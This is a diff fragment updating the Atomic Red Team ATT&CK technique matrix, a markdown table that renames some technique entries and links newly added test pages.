 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -51,7 +51,7 @@
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
-|  |  |  |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -7,18 +7,18 @@
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Rootkit](../../T1014/T1014.md) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Archive Collected Data](../../T1560/T1560.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -36,7 +36,7 @@
 |  | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Steal Application Access Token](../../T1528/T1528.md) | [Query Registry](../../T1012/T1012.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -54,7 +54,7 @@
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
